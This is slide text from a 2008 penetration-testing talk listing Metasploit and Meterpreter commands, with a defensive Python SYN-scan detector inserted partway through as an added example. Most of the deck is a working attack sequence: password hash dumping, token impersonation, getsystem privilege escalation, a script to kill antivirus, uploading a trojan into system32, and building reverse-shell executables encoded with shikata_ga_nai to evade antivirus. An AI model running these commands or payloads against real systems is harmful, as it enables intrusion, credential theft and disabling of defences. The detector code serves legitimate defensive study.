Andrés Morales Zamudio: OSCP OSWP GCIH GPEN CPTS C|EH OSCE ISO 27001 LA CISSP


Andrés Morales Zamudio, andresmoraleszamudio@gmail.com
OSCP OSWP GCIH GPEN CPTS C|EH OSCE ISO 27001 LA CISSP

Auxiliaries. Meterpreter modules.

Incognito. Espia. Privilege escalation. Scripts.

Building .exe payloads. Goodbye antivirus.

Systems Engineer. Presales Engineer at Ximark. OSCP OSWP GCIH GPEN CPTS C|EH OSCE ISO 27001 LA CISSP. Four years of experience in information security, performing pentests, incident handling and forensic analysis for government, banking, telco and retail organizations across the region. Ekoparty Warrior, winner of the first PacketWars held in Latin America. October 2008, Argentina.

Port Scanning

msf > search portscan
msf > use auxiliary/scanner/portscan/syn
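From the defender's side, the SYN scanner above produces a recognizable traffic shape: one source sending bare SYNs to many distinct ports on a host within seconds. The following detector is an added example, not part of the original slides; it assumes a simplified, constructed connection-log layout ("timestamp src dst dport flags") and flags any source/destination pair whose distinct SYN-only destination ports inside a sliding time window reach a threshold.

```python
"""Detect SYN port sweeps from connection-log lines.

Added example (not from the original slides). Assumes a simplified
log format "ISO-timestamp src dst dport flags", where flags "S" is a
bare SYN and "SA" a SYN/ACK; real sensors (firewall, Zeek, netflow)
will need their own parse_line().
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines: 10.0.0.5 sweeps seven ports in two seconds,
# 10.0.0.7 makes one ordinary connection, 10.0.0.9 touches two ports
# four minutes apart (normal browsing, not a sweep).
SAMPLE_LOG = """\
2008-10-03T10:00:00 10.0.0.5 10.0.0.20 22 S
2008-10-03T10:00:00 10.0.0.5 10.0.0.20 80 S
2008-10-03T10:00:01 10.0.0.5 10.0.0.20 135 S
2008-10-03T10:00:01 10.0.0.5 10.0.0.20 139 S
2008-10-03T10:00:01 10.0.0.5 10.0.0.20 445 S
2008-10-03T10:00:02 10.0.0.5 10.0.0.20 3389 S
2008-10-03T10:00:02 10.0.0.5 10.0.0.20 8080 S
2008-10-03T10:00:05 10.0.0.7 10.0.0.20 445 S
2008-10-03T10:00:06 10.0.0.7 10.0.0.20 445 SA
2008-10-03T10:05:00 10.0.0.9 10.0.0.20 80 S
2008-10-03T10:09:00 10.0.0.9 10.0.0.20 443 S
"""


def parse_line(line):
    """Split one constructed log line into typed fields."""
    ts, src, dst, dport, flags = line.split()
    return datetime.fromisoformat(ts), src, dst, int(dport), flags


def detect_syn_sweeps(log_text, port_threshold=5, window=timedelta(seconds=10)):
    """Return {(src, dst): sorted ports} for every pair whose distinct
    SYN-only destination ports within any sliding window of `window`
    reach `port_threshold`. Ports from all such windows are unioned so
    the report shows the whole sweep, not just the first few probes."""
    events = defaultdict(list)  # (src, dst) -> [(timestamp, dport)]
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        ts, src, dst, dport, flags = parse_line(raw)
        if flags != "S":  # only bare SYNs count as probes; SYN/ACK is a reply
            continue
        events[(src, dst)].append((ts, dport))

    hits = {}
    for pair, probes in events.items():
        probes.sort()
        flagged = set()
        left = 0
        for right in range(len(probes)):
            # Slide the left edge so probes[left:right+1] fits the window.
            while probes[right][0] - probes[left][0] > window:
                left += 1
            ports = {p for _, p in probes[left:right + 1]}
            if len(ports) >= port_threshold:
                flagged |= ports
        if flagged:
            hits[pair] = sorted(flagged)
    return hits


if __name__ == "__main__":
    for (src, dst), ports in detect_syn_sweeps(SAMPLE_LOG).items():
        print(f"SYN sweep from {src} against {dst}: ports {ports}")
```

The threshold and window are the tuning knobs: a low threshold over a long window also catches slow scans at the cost of more false positives from legitimate multi-port clients, so start strict and widen per network.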

SMB Version Scanning

msf > use auxiliary/scanner/smb/version
msf auxiliary(version) > db_hosts

meterpreter > help
meterpreter > ps
meterpreter > migrate pid
meterpreter > ls
meterpreter > download c:\\boot.ini
meterpreter > upload troyano.exe c:\\windows\\system32

meterpreter > ipconfig
meterpreter > getuid
meterpreter > execute -f cmd.exe -i -H
meterpreter > shell
meterpreter > idletime
meterpreter > hashdump

meterpreter > use incognito
meterpreter > help
meterpreter > list_tokens -u
meterpreter > impersonate_token WIN2K8\\Administrator
meterpreter > getuid
meterpreter > execute -f cmd.exe -i -t

http://labs.mwrinfosecurity.com/publications/mwri_security-implications-ofwindows-access-tokens_2008-04-14.pdf

meterpreter > ps
meterpreter > migrate 260    (260 is the PID of Explorer.exe)

meterpreter > use espia
meterpreter > screengrab

meterpreter > getuid
meterpreter > use priv
meterpreter > getsystem -h
meterpreter > getsystem
...got system (via technique 4).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > run checkvm
meterpreter > run getcountermeasure
meterpreter > run getgui
meterpreter > run getgui -e
meterpreter > run gettelnet
meterpreter > run gettelnet -e
meterpreter > run killav

meterpreter > run get_local_subnets
meterpreter > run hostsedit
meterpreter > run remotewinenum
meterpreter > run remotewinenum -u administrador -p yotengolacontrasena -t 10.211.55.128
meterpreter > run winenum
meterpreter > run scraper

./msfpayload windows/shell_reverse_tcp O
./msfpayload windows/shell_reverse_tcp LHOST=192.168.147.128 LPORT=8080 O
./msfpayload windows/shell_reverse_tcp LHOST=192.168.147.128 LPORT=8080 X > /tmp/1.exe
file /tmp/1.exe

./msfpayload windows/shell_reverse_tcp LHOST=192.168.147.128 LPORT=8080 R | ./msfencode -e x86/shikata_ga_nai -t exe > /tmp/2.exe

./msfpayload windows/shell/reverse_tcp LHOST=192.168.147.128 LPORT=8080 X > /tmp/a.exe
./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.147.128 LPORT=8080 E
http://www.offensive-security.com/metasploit-unleashed/Antivirus_Bypass

THANK YOU!
